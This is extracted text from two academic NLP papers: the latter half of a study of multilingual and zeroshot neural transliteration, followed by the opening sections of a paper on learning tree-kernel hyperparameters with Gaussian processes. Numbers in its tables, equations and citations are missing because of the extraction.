observe a decrease in confusion between aspirated and unaspi- rated sounds. for arabic→slavic transliteration, we see substantial error reduction for the following char- acter pairs k-c, f-v and p-b. • for slavic→arabic, we observed a significant re- duction in the number of errors related to characters representing fricative sounds like j,s,z,g (buckwalter romanization). • the multilingual system seems to prefer the canon- ical spellings, even when other alternative spellings seem faithful to the source language phonetics. the system is thus able to learn conventional usage better than the bilingual models. e.g. morisa (hindi, ro- manized text shown) is transliterated incorrectly to the phonetically acceptable english word moris by the bilingual model. the multilingual model gener- ates the correct system maurice. • since indic scripts are very phonetic, very few non-canonical spellings are possible. as a conse- quence, vowel error reduction was also minimum for english-indic transliteration ( %). this may partly explain why multilingual training provides minimal benefit for english-indic transliteration. table shows some examples where multilingual output is better than the bilingual output. figure : visualization of contextual representations of vowels for hi-en transliteration. each colour rep- resents a different vowel. . analysis we investigated a few hypotheses to understand why multilingual models are better: better contextual representations for vowels: we hypothesize that the encoder learns better contex- tual representations for vowels. to test this hypoth- esis, we studied character long sequences from the test set with a vowel in the middle (i.e., -char win- dow around vowel). we processed these sequences through the encoder of the bilingual and multilin- gual transliteration systems to generate the encoder output corresponding to the vowels. for instance, for the vowel a in the word part, we encode the character sequence par using the encoder. the en- coder output corresponding to the character a is con- sidered the contextual representation of the charac- ter a in this word. figure shows a visualization of these contextual representations of the vowels using t-sne (van der maaten and hinton, ). for the bilingual model, we observe that the contextual rep- resentations of same vowels tend to cluster together. for the multilingual model, the clustering is more specialized. the representations are grouped by the vowel along with the context. for instance, the re- gion highlighted in the plot shows representations of hindi vowels e (yellow) and i (blue) followed by the consonant v. other vowels with the same context are seen in the same region too. this suggests that the multilingual model is able to learn specialized rep- resentations of vowels in different contexts and this helps the decoder generate correct transliterations. more monolingual data: in the many-one scenario, more monolingual data is available for the target lan- guage since target words from all training language pairs are available. we hypothesize that this may help the decoder to better model the target language sequence. to test this, we decoded the test data using the bilingual models along with a larger target rnn lm (with lstm units) using shallow fusion (gul- cehre et al., ). the rnn lm was trained on all the target language words across all parallel cor- pora. these experiments were performed for indic- english and slavic-arabic pairs. we did not observe any major change in the transliteration accuracies of bilingual models due to integration of a larger lm. thus, larger target side data does not explain the im- provement in transliteration accuracy due to multi- lingual transliteration. more parallel data: multilingual training pools to- gether parallel corpora from multiple orthographi- cally similar languages, which effectively increases the data available for training. to test if this ex- plains the improved performance, we compared mul- tilingual and bilingual models under similar data size conditions, i.e., the total parallel corpora size across all language pairs used to train the multilin- gual model is equivalent to the size of the bilingual corpus used to train the bilingual model. specifically we compared the following under similar data size conditions: (a) {bn,hi,kn,ta}-en multilingual model ( %hi-en training pairs) withhi-enbilingual model (b) {cs,pl,sk,sl}-ar multilingual model ( % pl-ar training pairs) with pl-ar bilingual model. table shows the results of these experiments. we ob- served that the multilingual system showed signif- icantly higher transliteration accuracy compared to the bilingual model for polish-arabic. for hindi- english, the bilingual model was better than the mul- tilingual model. so, we cannot decisively conclude that the performance improvement of multilingual transliteration can be attributed to the effective in- crease in training data size. in a multilingual train- ing scenario, data from other languages act as noisy pair b m pl-ar . . hi-en . . table : results of experiments under balanced data conditions pair sepdec sepout sepnone pair sepdec sepout sepnone indic-indic bn-hi . . . kn-bn . . . bn-kn . . . kn-ta . . . hi-bn . . . ta-hi . . . hi-ta . . . ta-kn . . . arabic-slavic english-indic ar-cs . . . en-bn . . . ar-pl . . . en-hi . . . ar-sk . . . en-kn . . . ar-sl . . . en-ta . . . table : comparison of multilingual architectures version of data from the original language and sup- plement the available bilingual data, but they can- not necessarily substitute data from the original lan- guage pair. . comparison with variant architectures we compare three variants of the encoder-decoder architecture: (a) our model: target language specific output layer (and parameters) (sepout), (b) every tar- get language has its own decoder and output layer (sepdec) (lee et al., ), and (c) all languages share the same decoder and output layer, but the first to- ken of the input sequence is a special token to spec- ify target language (sepnone) (johnson et al., ). these architectures differ in the degree of parameter sharing. sepdec has fewer shared parameters than our model and sepnone has more shared parameters than our model. in all three cases, the encoder is shared across all source languages. table shows the re- sults of this comparison. we cannot definitively con- clude if one model is better than the other. except for arabic-slavic transliteration, the trend seems to indicate that models with greater parameter sharing (sepout/sepnone) may perform better. in any case, given the comparable results we prefer models with fewer model parameters (sepout/sepnone). zeroshot transliteration in the previous sections, we have shown that multi- lingual training is beneficial for language pairs ob- served during training. in addition, the encoder- decoder architecture opens up the possibility of ze- roshot transliteration i.e., transliteration between language pairs that have not been seen during train- ing. the encoder-decoder architecture decouples the source and target language network compo- nents and makes the architecture more modular. as a consequence, we can consider the encoder out- put (for the source language) to be embedded in a language-neutral, common subspace - a sort of inter- lingua. the decoder proceeds to generate the target word from the language neutral representation of the source word. hence, training on just a few language pairs is sufficient to learn all language-specific pa- rameters - making zeroshot transliteration possible. before describing different zeroshot translitera- tion scenarios, we introduce a few terms. a language that is the source in any language pair seen during training is said to be source-covered. we can define target-covered languages analogously. now, we can envisage the following zeroshot transliteration sce- narios: (a) unseen language pairs: both the source and target languages are covered, but the pair was not observed during training, (b) unseen source lan- guage: the source language is not covered, but it is orthographically similar to other source-covered lan- guages, (c) unseen target language: can be defined analogously. next, we describe our proposed solu- tions to these scenarios. . unseen language pair we investigated the following solutions: multilingual zeroshot-direct: since source and target languages are covered, we use the trained mul- tilingual model discussed in previous sections for source-target transliteration. model selection can be an issue for this approach. as discussed earlier, model selection using valida- tion set accuracy for each language pair is better than average validation set loss. for an unseen language pair, we cannot use validation set accuracy/loss for model selection (since validation data is not avail- able). so we explored the following model selection criterion: maximum average validation set accuracy across all the trained language pairs (sc_acc). we also compared sc_acc to the model with least av- erage validation set loss over all training language pairs (sc_loss). nevertheless, there are inherent limitations to model selection by averaging validation accuracy or loss for trained language pairs. irrespective of the model selection method used, the chosen model may still be suboptimal for unseen language pairs since the network is not optimized for such pairs. multilingual zeroshot-pivot: to address the limi- tations with zeroshot-direct transliteration, we pro- pose transliteration from source to target using a pivot language, and pipelining the best source-pivot and pivot-target transliteration models. we choose a pivot language such that the network has been trained for source-pivot and pivot-target pairs. since the network has been trained for the source-pivot and target-pivot pairs, we can expect optimal perfor- mance in each stage of the pipeline. note thatweuse the multilingual model for source-pivot and pivot- target transliteration (we found it better than using the bilingual models). to reduce cascading errors due to pipelining, we consider the top-k source-pivot transliterations in the next stage of the pipeline. the probability for a target word y given the source word x is computed as: p(y|x) = k∑ i= p(y|zi)p(zi|x) ( ) zi: ith best source-pivot transliteration. we used k= . . unseen source language an unseen source language can be easily handled in our architecture. though the language has not been source-covered, a source word can be directly processed through the network since all source lan- guages share the encoder and character embeddings. . unseen target language handling an unseen target language is tricky since the output layer is specific to each target language. hence, parameters for the unseen language’s output layer cannot be learned during training. note that even architectures where the entire network is com- pletely shared between all language pairs (johnson et al., ) cannot handle an unseen target language - pair biling zeroshot zeroshotdirect pivoting † direct sc_acc sc_loss sc_ora bn-ta . . (hi) . . . ta-bn . . (hi) . . . hi-kn . . (ta) . . . kn-hi . . (ta) . . . † best pivot for multilingual pivoting in brackets (a) unseen language pair method slavic-ar (cs-ar) indic-en (hi-en) bilingual . . zeroshot . . multilingual . . (b) unseen source language method ar-slavic (ar-cs) en-indic (en-hi) proxy acc proxy acc bilingual none . none . sk . kn . proxy sl . bn . pl . ta . proxy sk . kn . + sl . bn . lmfusion pl . ta . (c) unseen target language table : results for zeroshot transliteration the embedding for target language indicator tokens are not learned during training for unseen target lan- guages. we found that simple approaches like as- signing parameters for unseen target languages by averaging the parameters of the trained target lan- guages do not work. hence, we use a target-covered language as proxy for the unseen target language. the simplest ap- proach considers the output of the source to proxy language transliteration system as the target lan- guage’s output. however, this doesn’t take into ac- count phonotactic characteristics of the target lan- guage. we propose to incorporate this information by using an rnn (using lstm units) character-level language model of the target language words. while predicting the next output character during decoding, we combine the scores from the multilingual translit- eration model and the target lm using shallow fu- sion of the transliteration model and the language model (gulcehre et al., ). . results and discussion we discuss the results for each scenario below. . . unseen language pair we experimented with transliteration between four indic languages viz., hi,bn,ta,kn. we trained a mul- tilingual model on out of the possible language pairs, covering all the languages. the remaining language pairs (ta-bn, bn-ta, hi-kn and hi-kn) are the unseen language pairs (results in table a). zeroshot vs. direct bilingual: for all unseen lan- guage pairs, all zeroshot systems (pivot as well dif- ferent direct configurations) are better than the di- rect bilingual system. note that unlike the zeroshot systems, the bilingual systems were directly trained on the unseen language pairs. yet the zeroshot sys- tems outperform direct bilingual systems since the underlying multilingual models are significantly bet- ter than the bilingual models (as seen in section ). these results show that the multilingual model gen- eralizes well to unseen language pairs. direct vs. pivot zeroshot: we also observe that the pivot zeroshot system is better than both of the direct zeroshot systems (sc_acc and sc_loss). to verify if the limitations of the model selection criterion ex- plain the direct system’s relatively lesser accuracy, we also considered an oracle direct zeroshot system (sc_ora). the oracle system selects the model with the best accuracy using a parallel validation corpus for the unseen language pair. this oracle system is also inferior to the pivot transliteration model. so, we can conclude that the network is better tuned for transliteration of language pairs it has been directly trained on. hence, multilingual pivoting works bet- ter than direct transliteration in spite of the cascading errors involved in pipelining. model selection criteria: for the direct zeroshot system, the average accuracy (sc_acc) is a better model selection criterion than average loss (sc_loss). . . unseen source language we conducted experiments: (a) train on (bn,kn,ta)- en pairs and test on hi-en pair, and; (b) train on (pl,sk,sl)-ar pairs and test on cs-ar pair. see table b for results. in this scenario, too, we observe that zeroshot transliteration performs better than direct bilingual transliteration. in fact, zeroshot transliter- ation is competitive with multilingual transliteration too (accuracy is > % of multilingual translitera- tion). though the network has not seen the source language, the encoder is able to generate source lan- guage representations that are useful for decoding. . . unseen target language we conducted experiments: (a) train on ar- (pl,sk,sl) pairs and test on ar-cs pair, and;(b) train on en-(bn,kn,ta) pairs and test on en-hi pair. the target languages used in training were the proxy languages. see table c for results. we observe contradictory results for the experi- ments. for ar-cs, the use of proxy language gives transliteration results better than bilingual transliter- ation. but, the proxy language is not a good substi- tute for hindi. shallow fusion of target lm with the transliteration model makes little difference. we see that the transliteration performance of proxy languages is correlated to its orthographic sim- ilarity to the target language. thus, it is preferable to choose a proxy with high orthographic similar- ity to the target language. we see one anomaly to this trend. kannada as proxy performs badly com- pared to bengali, though kannada is orthographi- cally more similar to hindi. one reason could be the orthographic convention in hindi and bengali that the terminal vowel is automatically suppressed. in kannada, the vowel has to be explicitly suppressed with a terminal halanta character. simply deleting theterminalhalanta in kannadaoutput to conform to hindi conventions increases accuracy to . % (bet- ter than bengali). clearly, shallow fusion is not suf- ficient to adapt a proxy language’s output to the tar- get language, and further investigations are required. if a proxy-target corpus is available, we can generate better transliterations via pivoting. incorporating phonetic information so far, we considered characters as atomic units. we have thus relied on correspondences between charac- ters for multilingual learning. in addition, for some languages, we can find an almost one-one correspon- dence from the characters to phonemes (a basic unit of sound). each phoneme can be factorized into a set of articulatory properties like place of articulation, nasalization, voicing, aspiration, etc. if the input for transliteration incorporates these phonetic prop- erties, it may learn better character representations pair o ph pair o ph indic- bn-en . . kn-en . . english hi-en . . ta-en . . bn-hi . . kn-bn . . indic- bn-kn . . kn-ta . . indic hi-bn . . ta-hi . . hi-ta . . ta-kn . . table : onehot (o) vs. phonetic (ph) input across languages by bringing together similar char- acters. e.g. the kannada character ಳ (la), has no hindi equivalent character, but the hindi character ल (la) is the closest character. the two characters differ in terms of one phonetic feature (the retroflex property), which can be represented in the phonetic input and can serve to indicate the similarity between the two characters. we incorporated phonetic features in our model by using feature-rich input vectors instead of the con- ventional onehot vector input for characters. our phonetic feature input vector is a bitvector encod- ing the phonetic properties of the character, one bit for each value of every property. the multiplication of the phonetic feature vector with the weight ma- trix in the first layer generates phonetic embeddings for each character. these are inputs to the encoder. apart from this input change, the rest of the network architecture is the same as described in section . . experiments: we experimented with indian lan- guages (indic→english and indic-indic translitera- tion). indic scripts generally have a one-one cor- respondence from characters to phonemes. hence, we use phonetic features described by kunchukut- tan et al. ( ) to generate phonetic feature vectors for characters (available via the indicnlplibrary ). these indic languages are spoken by nearly a billion people and hence the use of phonetic features is use- ful for many of the world’s most widely spoken lan- guages. results and discussion: table shows the results. we observe that phonetic feature input improves transliteration accuracy for indic-english transliter- ation. the improvements are primarily due to reduc- tion in errors related to similar consonants like (t,d), (p,b), (c,k) and the use of h for aspiration. https://github.com/anoopkunchukuttan/indic_ nlp_library for indic-indic transliteration, we see moderate improvement in transliteration accuracy due to pho- netic feature input. since the source as well as tar- get scripts are largely phonetic, phonetic representa- tion may not be useful in resolving ambiguities (un- like indic-english transliteration). again, we see im- provements due to reduction of errors related to sim- ilar consonants. conclusion and future work we show that multilingual training using a neural encoder-decoder architecture significantly improves transliteration involving orthographically similar languages compared to bilingual training. our key idea is maximal sharing of network components in order to utilize high task relatedness on account of orthographic similarity. the primary reasons for the improvements could be: (a) learning of specialized representations by the shared encoder and; (b) abil- ity to learn canonical spellings. we also show that the multilingual transliteration models can general- ize well to language pairs not encountered during training and observe that zeroshot transliteration can outperform direct bilingual transliteration in many cases. moreover, multilingual transliteration can be further improved by shared phonetic input. transliteration is an example of a sequence to se- quence task which is characterized by the follow- ing properties: (a) small vocabulary (b) short se- quences (c) monotonic transformation (d) unequal source and target sequence length (e) significant vo- cabulary overlap across languages. given the bene- fits we have shown for multilingual transliteration, other nlp tasks that can be characterized simi- larly (viz., grapheme to phoneme conversion, trans- lation of short text like tweets and headlines between related languages at subword level, and possibly speechrecognitionaswellastts)couldalsobenefit from multilingual training. acknowledgements we would like to thank rudramurthy v for making available code for parsing wikidata and extracting multilingual named entities. we would also like to thank the action editor and reviewers for their valu- able comments. references dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learn- ing to align and translate. in international conference on learning representations. rafael e. banchs, min zhang, xiangyu duan, haizhou li, and a. kumaran. . report of news machine transliteration shared task. in proceedings of the fifth named entities workshop. maximilian bisani and hermann ney. . joint- sequence models for grapheme-to-phoneme conver- sion. speech communication. rich caruana. . multitask learning. machine learn- ing. daxiang dong, hua wu, wei he, dianhai yu, and haifeng wang. . multi-task learning for mul- tiple language translation. in annual meeting of the association for computational linguistics. andrew finch and eiichiro sumita. . a bayesian model of bilingual segmentation for transliteration. in internationalworkshoponspokenlanguagetransla- tion. andrew finch, lemao liu, xiaolin wang, and eiichiro sumita. . neural network transduction models in transliteration generation. in proceedings of the fifth named entities workshop. andrew finch, lemao liu, xiaolin wang, and eiichiro sumita. . target-bidirectional neural models for machine transliteration. in proceedings of the sixth named entities workshop. orhan firat, kyunghyun cho, and yoshua bengio. . multi-way, multilingual neural machine translation with a shared attention mechanism. in conference of the north american chapter of the association for computational linguistics. dan gillick, cliff brunk, oriol vinyals, and amarnag subramanya. . multilingual language process- ing from bytes. in conference of the north american chapter of the association for computational linguis- tics. caglar gulcehre, orhan firat, kelvin xu, kyunghyun cho, and yoshua bengio. . on integrating a lan- guage model into neural machine translation. com- puter speech and language. junqing he, long wu, xuemin zhao, and yonghong yan. . hccl at semeval- task : combin- ing multilingual word embeddings and transliteration model for semantic similarity. in proceedings of the th international workshop on semantic evaluation. jagadeesh jagarlamudi and hal daumé iii. . reg- ularized interlingual projections: evaluation on mul- tilingual transliteration. in proceedings of the joint conference on empirical methods in natu- ral language processing and computational natural language learning. sittichai jiampojamarn, colin cherry, and grzegorz kon- drak. . joint processing and discriminative train- ing for letter-to-phoneme conversion. in annual meet- ing of the association for computational linguistics. sittichai jiampojamarn, aditya bhargava, qing dou, kenneth dwyer, and grzegorz kondrak. . di- rectl: a language-independent approach to translit- eration. in proceedings of the named entities workshop: shared task on transliteration. melvin johnson, mike schuster, quoc v. le, maxim krikun, yonghui wu, zhifeng chen, nikhil thorat, fernanda b. viégas, martin wattenberg, greg cor- rado, macduff hughes, and jeffrey dean. . google’s multilingual neural machine translation sys- tem: enabling zero-shot translation. transactions of the association for computational linguistics. sarvnaz karimi, falk scholer, and andrew turpin. . machine transliteration survey. acm computing sur- veys. mitesh m. khapra, a. kumaran, and pushpak bhat- tacharyya. . everybody loves a rich cousin: an empirical study of transliteration through bridge lan- guages. in human language technologies: the annual conference of the north american chapter of the association for computational linguistics. diederikkingmaandjimmyba. . adam: amethod for stochastic optimization. in international confer- ence on learning representations. alexandre klementiev and dan roth. . weakly supervised named entity transliteration and discovery from multilingual comparable corpora. inproceedings of the st internationalconferenceoncomputational linguistics and the th annual meeting of the asso- ciation for computational linguistics. philipp koehn, hieu hoang, alexandra birch, chris callison-burch, marcello federico, nicola bertoldi, brooke cowan, wade shen, christine moran, richard zens, chris dyer, ondřej bojar, alexandra constantin, and evan herbst. . moses: open source toolkit for statistical machine translation. in proceedings of the th annual meeting of the acl on interactive poster and demonstration sessions. a. kumaran, mitesh m. khapra, and pushpak bhat- tacharyya. . compositional machine transliter- ation. acm transactions on asian language infor- mation processing. anoop kunchukuttan and pushpak bhattacharyya. . data representation methods and use of mined corpora for indian language transliteration. in named entities workshop. anoop kunchukuttan, ratish puduppully, and pushpak bhattacharyya. . brahmi-net: a transliteration and script conversion system for languages of the in- dian subcontinent. in conference of the north amer- ican chapter of the association for computational linguistics - human language technologies: system demonstrations. anoop kunchukuttan, pushpak bhattacharyya, and mitesh m. khapra. . substring-based unsu- pervised transliteration with phonetic and contextual knowledge. in signll conference on computational natural language learning. jason lee, kyunghyun cho, and thomas hofmann. . fully character-level neural machine transla- tion without explicit segmentation. transactionsof the association for computational linguistics. bruno pouliquen, ralf steinberger, camelia ignat, tem- nikova irina, and anna widiger. . multilingual person name recognition and transliteration. corela. ram prakash. . quillpad multilingual predictive transliteration system. in proceedings of the second workshop on advances in text input methods. v. rudramurthy, mitesh m. khapra, and pushpak bhat- tacharyya. . sharing network parameters for crosslingual named entity recognition. arxiv preprint arxiv: . . amrita saha, mitesh m. khapra, sarath chandar, ja- narthanan rajendran, and kyunghyun cho. . a correlational encoder-decoder architecture for pivot- based sequence generation. in international confer- ence on computational linguistics. rico sennrich, orhan firat, kyunghyun cho, alexan- dra birch, barry haddow, julian hitschler, marcin junczys-dowmunt, samuel läubli, antonio valerio miceli barone, jozef mokry, and maria nadejde. . nematus: a toolkit for neural machine trans- lation. in software demonstrations of the th con- ference of the european chapter of the association for computational linguistics. nitish srivastava, geoffrey hinton, alex krizhevsky, ilya sutskever, and ruslan salakhutdinov. . dropout: a simple way to prevent neural networks from overfitting. the journal of machine learning research. kārumūri v subbārāo. . south asian languages: a syntactic typology. cambridge university press. harshit surana and anil kumar singh. . a more discerning and adaptable multilingual transliteration mechanism for indian languages. in proceedings of the third international joint conference on natural language processing. laurens van der maaten and geoffrey hinton. . vi- sualizing data using t-sne. journalofmachinelearn- ing research. denny vrandečić and markus krötzsch. . wikidata: a free collaborative knowledgebase. communications of the acm. zhilin yang, ruslan salakhutdinov, and william cohen. . multi-task cross-lingual sequence tagging from scratch. arxiv preprint arxiv: . . su-youn yoon, kyoung-young kim, and richard sproat. . multilingual transliteration using fea- ture based phonetic method. in annual meeting- association for computational linguistics. barret zoph, deniz yuret, jonathan may, and kevin knight. . transfer learning for low-resource neural machine translation. learning structural kernels for natural language processing daniel beck department of computer science university of sheffield, united kingdom debeck @sheffield.ac.uk trevor cohn computing and information systems university of melbourne, australia t.cohn@unimelb.edu.au christian hardmeier department of linguistics and philology uppsala university, sweden christian.hardmeier@lingfil.uu.se lucia specia department of computer science university of sheffield, united kingdom l.specia@sheffield.ac.uk abstract structural kernels are a flexible learning paradigm that has been widely used in natural language processing. however, the problem of model selection in kernel-based methods is usually overlooked. previous approaches mostly rely on setting default values for ker- nel hyperparameters or using grid search, which is slow and coarse-grained. in con- trast, bayesian methods allow efficient model selection by maximizing the evidence on the training data through gradient-based methods. in this paper we show how to perform this in the context of structural kernels by using gaussian processes. experimental results on tree kernels show that this procedure results in better prediction performance compared to hyperparameter optimization via grid search. the framework proposed in this paper can be adapted to other structures besides trees, e.g., strings and graphs, thereby extending the util- ity of kernel-based methods. introduction kernel-based methods are a staple machine learning approach in natural language processing (nlp). frequentist kernel methods like the support vector machine (svm) pushed the state of the art in many nlp tasks, especially classification and regression. one interesting aspect of kernels is their ability to be defined directly on structured objects like strings, trees and graphs. this approach has the potential to move the modelling effort from feature engineering to kernel engineering. this is useful when we do not have much prior knowledge about how the data behaves, as we can more readily define a similarity metric between inputs instead of trying to character- ize which features are the best for the task at hand. kernels are a very flexible framework: they can be combined and parameterized in many different ways. complex kernels, however, lead to the prob- lem of model selection, where the aim is to obtain the best kernel configuration in terms of hyperpa- rameter values. the usual approach for model selec- tion in frequentist methods is to employ grid search on some development data disjoint from the training data. this approach can rapidly become impracti- cal when using complex kernels which increase the number of model hyperparameters. grid search also requires the user to explicitly set the grid values, making it difficult to fine tune the hyperparameters. recent advances in model selection tackle some of these issues, but have several limitations (see § for details). our proposed approach for model selection re- lies on gaussian processes (gps) (rasmussen and williams, ), a widely used bayesian kernel ma- chine. gps allow efficient and fine-grained model selection by maximizing the evidence on the training data using gradient-based methods, dropping the re- quirement for development data. as a bayesian pro- cedure, gps also naturally balance between model capacity and generalization. gps have been shown to achieve state of the art performance in various re- gression tasks (hensman et al., ; cohn and spe- cia, ). therefore, we base our approach on this framework. while prediction performance is important to consider (as we show in our experiments), we are transactions of the association for computational linguistics, vol. , pp. – , . action editor: stefan riezler. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. distributed under a cc-by . license. mainly interested in two other significant aspects that are enabled by our approach: • gradient-based methods are more efficient than grid search for high dimensional spaces. this allows us to easily propose new rich kernel ex- tensions that rely on a large number of hyper- parameters, which in turn can result in better modelling capacity. • since the model selection process is now fine- grained, we can interpret the resulting hyperpa- rameter values, depending on how the kernel is defined. in this work we focus on tree kernels, which have been successfully used in a number of nlp tasks (see § ). in most cases, these kernels are used as an svm component and model selection is not consid- ered an important issue. hyperparameters are usu- ally set to default values, which work reasonably well in terms of prediction performance. however, this is only possible due to the small number of hy- perparameters these kernels contain. we perform experiments comprising synthetic data (§ ) and two real nlp regression tasks: emo- tion analysis (§ . ) and translation quality estima- tion (§ . ). our findings show that our approach out- performs svms using the same kernels. gaussian process regression our definition of gps closely follows that of rasmussen and williams ( ). consider a setting where we have a dataset x = {(x ,y ), (x ,y ), . . . , (xn,yn)}, where xi is a d- dimensional input and yi the corresponding out- put. our goal is to infer an underlying function f : rd → r to explain this data, i.e. f(xi) ≈ yi. formally, f is drawn from a gp prior, f(x) ∼gp(µ(x),k(x,x′)), where µ(x) is the mean function, which is usually the constant, and k(x,x′) is the kernel function. in a regression setting, we assume that the res- ponse variables are noisy latent function evaluations, i.e., yi = f(xi) + η, where η ∼ n( ,σ n) is added white noise. we assume a gaussian likeli- hood, which allows us to obtain a closed formula solution for the posterior, namely y∗ ∼n(k∗(k + σni)− yt , k(x∗,x∗) −kt∗ (k + σni)− k∗), where x∗ and y∗ are respectively the test input and its response variable, k is the gram matrix corresponding to the training inputs and k∗ = [〈x ,x∗〉,〈x ,x∗〉, . . . ,〈xn,x∗〉] is the vector of kernel evaluations between the test input and each training input. a key property of gp models is their ability to perform efficient model selection. this is achieved by employing gradient-based methods to maximize the marginal likelihood, p(y|x,θ) = ∫ p(y|x,θ,f)p(f)df, where θ represents the vector of model hyperparam- eters and y is the vector of response variables from the training data. for a gaussian likelihood, we can take the log of the expression above to obtain in closed-form , log p(y|x,θ) = − yt g− y ︸ ︷︷ ︸ data fit − log |g| ︸ ︷︷ ︸ complexity penalty −n log π ︸ ︷︷ ︸ constant where g = k +σni. the data fit term is dependent on the training response variables, while the com- plexity penalty term relies only on the kernel and training inputs. since the first two terms have con- flicting objectives, optimizing the log marginal like- lihood will naturally achieve a compromise and thus limit overfitting (without the need for any validation step or additional data). to enable gradient-based optimization we need to derive the gradients w.r.t. the hyperparameters: ∂ ∂θj log p(y|x,θ) = yt g− ∂g ∂θj g− y − trace ( g− ∂g ∂θj ) . see rasmussen and williams ( , pp. - ) for de- tails on the derivation of this formula and also its correspondent gradient calculation. the gradients of g depend on the underlying ker- nel. therefore we can employ any kind of valid kernel in this procedure as long as its gradients can be computed. this not only allows for fine-tuning of hyperparameters but also allows for kernel exten- sions which are richly parameterized. tree kernels the seminal work on convolution kernels by haus- sler ( ) defines a broad class of kernels on dis- crete structures by counting and weighting the num- ber of substructures they share. applying haussler’s formulation to trees we reach a general formula for a tree kernel between two trees t and t , namely k(t , t ) = ∑ f∈f w(f)c (f)c (f), ( ) where f is the set of all tree fragments, c (f) and c (f) return the counts for fragment f in trees t and t , respectively, and w(f) assigns a weight to frag- ment f. in other words, we can consider the ker- nel a weighted dot product over vectors of fragment counts. the actual fragment set f is deliberately left undefined: different concepts of tree fragments define different tree kernels. in this paper, we will focus on subset tree ker- nels (henceforth sstk), first introduced by collins and duffy ( ). this kernel considers tree frag- ments that contains complete grammar rules (see figure for an example). consider the set of nodes in the two trees as n and n respectively. we de- fine ii(n) as an indicator function that returns if fragment fi ∈ f has root n and otherwise. a sstk can then be defined as: k(t , t ) = ∑ n ∈n ∑ n ∈n ∆(n ,n ) , ( ) where ∆(n ,n ) = |f|∑ i= λ s(i) ii(n )ii(n ) and s(i) is the number of fragments in i with at least one child . the formulation in equation is the same as the one shown in equation , except that we are now restricting the weights w(f) to be a function of a see pighin and moschitti ( ) for details and a proof on this derivation. tree fragments s b b a a a a b b s ba s ba a s b b a s b b a a figure : an example tree and the respective set of tree fragments defined by a sstk. hyperparameter λ. the original goal of λ is to act as a decay factor that penalizes contributions from larger fragments cf smaller ones (and therefore, it should be in the [ , ] interval). without this factor, the resulting distribution over tree pairs is skewed, giving extremely large values when trees are equal and rapidly decreasing for small differences over fragment counts. the decay factor helps to spread this distribution, effectively giving smaller weights to larger fragments. the function ∆ can be defined recursively, ∆(n ,n ) =    pr(n ) = pr(n ) λ pr(n ) = pr(n ) ∧ preterm(n ) λg(n ,n ) otherwise, where pr(n) is the grammar production at node n and preterm(n) returns true if n is a pre-terminal node. the function g is defined as follows: g(n ,n ) = |n |∏ i= (α + ∆(cin ,c i n )) , ( ) where |n| is the number of children of node n and cin is the i th child of node n. this recursive defini- tion is calculated efficiently by employing dynamic programming to cache intermediate ∆ results. equation also adds another hyperparameter, α. this hyperparameter was introduced by moschitti ( b) as a way to select between two differ- ent tree kernels. if α = , we get the original sstk, if α = , then we obtain the subtree kernel, which only allows fragments with terminal symbols in his original formulation, this hyperparameter was named σ but here we use α to not confuse it with the gp noise hyper- parameter. as leaves. we can also interpret the subtree kernel as a “sparse” version of the sstk, where the “non- subtree” fragments have their weights equal to zero. even though fragment weights are affected by both kernel hyperparameters, previous work did not discuss their effects. the usual procedure fixes α to (selecting the original sstk) and sets λ to a de- fault value (around . ). as explained in § , the gp model selection procedure enables us to learn fine- grained values for these hyperparameters, which can lead to better performing models and aid interpreta- tion. furthermore, it also allows us to extend these kernels by adding new hyperparameters. we pro- pose one such kernel in the next section. . symbol-aware subset tree kernel while varying the sstk hyperparameters can lead to different weight schemes, they do that in a very coarse way. for some applications, it may be nec- essary to give more weight to specific fragments or set of fragments (e.g., nps being more impor- tant than advp in an information extraction set- ting). the symbol-aware subset tree kernel (hence- forth, sasstk), which we introduce here, allows a more fine-grained control over the weights by em- ploying one λ and one α hyperparameter for each non-terminal symbol in the training data. the calcu- lation uses a similar recursive formula to the sstk, namely: ∆(n ,n ) =    pr(n ) = pr(n ) λx pr(n ) = pr(n ) ∧ preterm(n ) λxgx(n ,n ) otherwise, where x is the symbol at node n and gx(n ,n ) = |n |∏ i= (αx + ∆(c i n ,cin )) . ( ) the sasstk can be interpreted as a generaliza- tion of the sstk: we can recover the latter by tying all λ and setting all α = . by employing different hyperparameter values for each specific symbol, we can effectively modify the weights of all fragments where the symbol appears. table shows an exam- ple where we unrolled a kernel computation into its corresponding feature space, showing the resulting weighted counts for each feature. λs = λa = λb = λs = . λa = λb = λs = λa = λb = a → a b → b s → a b . s → (a a) b . s → a (b b) . s → (a a) (b b) . k(t,t) table : resulting fragment weighted counts for the ker- nel evaluation k(t,t), for different values of hyperparam- eters, where t is the tree in figure . . kernel gradients to enable hyperparameter optimization via gradient descent we must provide gradients for the kernels. in this section we derive the gradients for sasstk. from equation we know that the kernel is a dou- ble summation over the ∆ function. therefore all gradients are also double summations, but over the gradients of ∆. we can obtain these in a vectorized way, by considering the gradients of the hyperpa- rameter vectors λ and α over ∆. let k be the num- ber of symbols considered in the model and λ and α be k-dimensional vectors containing the respec- tive hyperparameters. in the following, we use the notation ∆i as a shorthand for ∆(cin ,c i n ) and we also omit the pa- rameters of gx. we start with the λ gradient: ∂∆ ∂λ =    pr(n ) = pr(n ) u pr(n ) = pr(n ) ∧ preterm(n ) ∂(λxgx) ∂λ otherwise, where x is the symbol at n , gx is defined in equa- tion and u is the k-dimensional unit vector with the element corresponding to symbol x equal to and all others equal to . the gradient in the third case is defined recursively, ∂(λxgx) ∂λ = ugx + λx ∂gx ∂λ = ugx + λx |n |∑ i= gx αx + ∆i ∂∆i ∂λ . the α gradient is derived in a similar way, ∂∆ ∂α =    pr(n ) = pr(n ) ∨ preterm(n ) ∂(λxgx) ∂α otherwise, and the gradient at the second case is also defined recursively, ∂(λxgx) ∂α = λx ∂gx ∂α = λx |n |∑ i= gx αx + ∆i ( u + ∂∆i ∂α ) . gradients can be efficiently obtained using dy- namic programming. in fact, they can be calculated at the same time as ∆ to improve performance since they all share many terms in their derivations. fi- nally, we can easily obtain the gradients for the orig- inal sstk by letting u = . . kernel normalization it is common practice when using tree kernels to nor- malize the kernel. this helps reduce the random ef- fect of tree size. normalization can be achieved us- ing the following, where k̂ is the normalized kernel: k̂(t , t ) = k(t , t )√ k(t , t )k(t , t ) . to apply this normalized version in the optimiza- tion procedure we must also derive gradients for the normalization function. in the following equation, we use kij and k̂ij as a shorthand for k(ti, tj) and k̂(ti, tj), respectively: ∂k̂ ∂θ = ∂k ∂θ√ k k − k̂ ∂k ∂θ k + k ∂k ∂θ k k . . other extensions many other structural 